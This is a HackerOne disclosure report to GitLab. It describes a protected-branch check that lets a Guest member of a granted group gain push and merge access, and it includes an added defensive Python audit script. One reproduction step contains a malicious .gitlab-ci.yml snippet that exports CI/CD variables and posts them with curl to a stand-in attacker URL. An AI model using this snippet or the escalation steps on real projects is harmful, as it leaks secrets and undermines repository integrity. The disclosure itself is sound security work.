Unauthorized member can gain `Allowed to push and merge` access and affect integrity of protected branches
HackerOne report #2104540 by theluci
on 2023-08-09, assigned to GitLab Team
Report
Hello,
I found that when a group is granted Allowed to push and merge access to the protected branch of a project, it is not checked whether the member gaining Allowed to push and merge access is at least a Developer in the granted group, but only whether the member has a max role of Developer in the project or not.
Background
GitLab provides a Premium/Ultimate feature to grant specific groups or specific users Allowed to merge and Allowed to push and merge access on protected branches.
When a specific user is granted Allowed to push and merge access, only users with at least the Developer role are listed and can be granted that access.
Similarly, when a group is granted Allowed to push and merge access on a protected branch of a project, only the members of that group who hold at least the Developer role are supposed to receive that access.
Vulnerability
When a group is granted Allowed to push and merge access on a protected branch of a project, it is not checked whether the user gaining that access is at least a Developer in the granted group. It is only checked whether the user
a) is a member of the granted group, and
b) has at least the Developer role (a max role of Developer or higher) in the project.
The project role in b) can come from a direct membership that has nothing to do with the granted group, so the following attack is possible:
- victim is the Owner of victim-project.
- attacker is a Developer of victim-project.
- victim goes to https://gitlab.com/<victim-group>/<victim-project>/-/project_members and adds granted-group as Developer.
- victim goes to https://gitlab.com/<victim-group>/<victim-project>/-/settings/repository, expands Protected branches and grants Allowed to push and merge access to granted-group. victim expects that only the members of granted-group with at least the Developer role receive that access.
- attacker succeeds in joining granted-group as a Guest. Since attacker and victim already work together on victim-project, it is quite easy and plausible for attacker to be added to granted-group as a Guest.
- attacker automatically gains Allowed to push and merge access on the protected branch. victim has no indication that attacker has gained this access.
- attacker can use this access to
  a) affect the integrity of the protected branch, and
  b) upload a malicious .gitlab-ci.yml file to leak the project's and parent group's CI/CD variables.
Steps to reproduce
- victim creates a group victim-group and activates an Ultimate trial.
- victim creates a project victim-project inside victim-group.
- victim goes to https://gitlab.com/<victim-group>/<victim-project>/-/project_members and adds attacker as Developer.
- victim creates a group granted-group.
- victim goes to the granted-group membership page https://gitlab.com/groups/<granted-group>/-/group_members and adds victim-member as Developer.
- victim goes to the victim-project membership page https://gitlab.com/<victim-group>/<victim-project>/-/project_members and invites granted-group as Developer.
- victim goes to https://gitlab.com/<victim-group>/<victim-project>/-/settings/repository, expands Protected branches and grants Allowed to push and merge access to granted-group. victim expects that only the members of granted-group with at least the Developer role receive that access.
- victim goes to the granted-group membership page https://gitlab.com/groups/<granted-group>/-/group_members and adds attacker as Guest. (Since attacker and victim already work together on victim-project, it is quite easy and plausible for attacker to be added to granted-group as a Guest.)
- attacker automatically gains Allowed to push and merge access on the protected branch. victim has no indication that attacker has gained this access.
- attacker can use this access to affect the integrity of the protected branch:
  - attacker can create a new file using the + symbol.
  - attacker may edit an existing file or delete an existing file.
- attacker can also use this access to upload a malicious .gitlab-ci.yml file with the following content, which leaks the project's and parent group's CI/CD variables (affecting confidentiality):
  job_name:
    script:
      - export > test.txt
      - curl -X POST --data "$(cat test.txt)" attacker-controlled-url
  (While testing this, make sure victim has added some CI/CD variables in victim-project and victim-group.)
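As an added example (not code from the report and not GitLab's own code), the following Python script models the access decision described in the Vulnerability section and walked through in the steps above. It works offline on constructed fixtures whose field names follow the public GitLab REST API (GET /projects/:id/members/all, GET /groups/:id/members, GET /projects/:id/protected_branches); the user IDs, the group ID 42, and the branch name main are assumptions. recipients_as_reported implements the check the report describes (member of the granted group and Developer or higher anywhere in the project), recipients_intended requires Developer or higher within the granted group itself, and audit_protected_branch lists users who pass the first but not the second, which in this scenario is exactly the attacker.

```python
"""Model of the group-grant check on a protected branch (added example).

Not GitLab's code. The fixtures below are constructed to resemble GitLab
REST API responses (field names follow the public API for
GET /projects/:id/members/all, GET /groups/:id/members and
GET /projects/:id/protected_branches); IDs, usernames and the branch name
are assumptions chosen to mirror the report's scenario.
"""
from typing import Dict, List, Optional

# GitLab access-level values as exposed by the REST API.
GUEST, REPORTER, DEVELOPER, MAINTAINER, OWNER = 10, 20, 30, 40, 50
ROLE_NAMES = {GUEST: "Guest", REPORTER: "Reporter", DEVELOPER: "Developer",
              MAINTAINER: "Maintainer", OWNER: "Owner"}

GRANTED_GROUP_ID = 42  # assumed ID of granted-group

# Constructed: effective membership of victim-project (direct, inherited and
# shared-group members, as /members/all reports). attacker is a direct
# Developer, exactly as in the report.
PROJECT_MEMBERS_ALL: List[Dict] = [
    {"id": 1, "username": "victim", "access_level": OWNER},
    {"id": 2, "username": "attacker", "access_level": DEVELOPER},
    {"id": 3, "username": "victim-member", "access_level": DEVELOPER},
]

# Constructed: direct members of granted-group after attacker has been
# added as Guest (the last step of the reproduction).
GRANTED_GROUP_MEMBERS: List[Dict] = [
    {"id": 3, "username": "victim-member", "access_level": DEVELOPER},
    {"id": 2, "username": "attacker", "access_level": GUEST},
]

# Constructed: protected branch with Maintainers plus granted-group allowed
# to push and merge (group_id set on the group-level entry).
PROTECTED_BRANCH: Dict = {
    "name": "main",
    "push_access_levels": [
        {"access_level": MAINTAINER, "user_id": None, "group_id": None},
        {"access_level": MAINTAINER, "user_id": None, "group_id": GRANTED_GROUP_ID},
    ],
}


def access_level_of(members: List[Dict], user_id: int) -> Optional[int]:
    """Return a user's access_level in a member list, or None if absent."""
    return next((m["access_level"] for m in members if m["id"] == user_id), None)


def recipients_as_reported(project_members_all: List[Dict],
                           group_members: List[Dict]) -> List[int]:
    """The check the report describes: member of the granted group AND at
    least Developer somewhere in the project. The project role may come
    from a direct membership unrelated to the granted group."""
    return sorted(
        m["id"] for m in group_members
        if (access_level_of(project_members_all, m["id"]) or 0) >= DEVELOPER
    )


def recipients_intended(group_members: List[Dict]) -> List[int]:
    """The check the UI promises: at least Developer within the granted group."""
    return sorted(m["id"] for m in group_members if m["access_level"] >= DEVELOPER)


def audit_protected_branch(branch: Dict, project_members_all: List[Dict],
                           group_members_by_id: Dict[int, List[Dict]]) -> List[Dict]:
    """For every group-level push grant on the branch, list users who pass
    the reported check but not the intended one: the unauthorized members
    that end up with push/merge access."""
    findings = []
    for entry in branch["push_access_levels"]:
        group_id = entry.get("group_id")
        if group_id is None:
            continue  # role-based or user-based entry, not a group grant
        group_members = group_members_by_id[group_id]
        unexpected = (set(recipients_as_reported(project_members_all, group_members))
                      - set(recipients_intended(group_members)))
        for user_id in sorted(unexpected):
            findings.append({
                "branch": branch["name"],
                "group_id": group_id,
                "user_id": user_id,
                "username": next(m["username"] for m in group_members if m["id"] == user_id),
                "group_role": ROLE_NAMES[access_level_of(group_members, user_id)],
                "project_role": ROLE_NAMES[access_level_of(project_members_all, user_id)],
            })
    return findings


if __name__ == "__main__":
    for f in audit_protected_branch(PROTECTED_BRANCH, PROJECT_MEMBERS_ALL,
                                    {GRANTED_GROUP_ID: GRANTED_GROUP_MEMBERS}):
        print(f"{f['username']} is only {f['group_role']} in group {f['group_id']} "
              f"but gets push/merge on {f['branch']} (project role {f['project_role']})")
```

To run the same audit against a real instance, replace the three fixtures with the JSON bodies of the corresponding API calls; any finding is a member whose role inside the granted group is below Developer yet who receives the group's push/merge grant.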
POC
Output of checks
This bug happens on GitLab.com (probably on self-managed instances too).
Impact
Unauthorized member can gain Allowed to push and merge access on protected branches and use this access to:
- Affect the integrity of the protected branches.
- Upload a malicious .gitlab-ci.yml file to leak the project's and parent group's CI/CD variables, affecting confidentiality.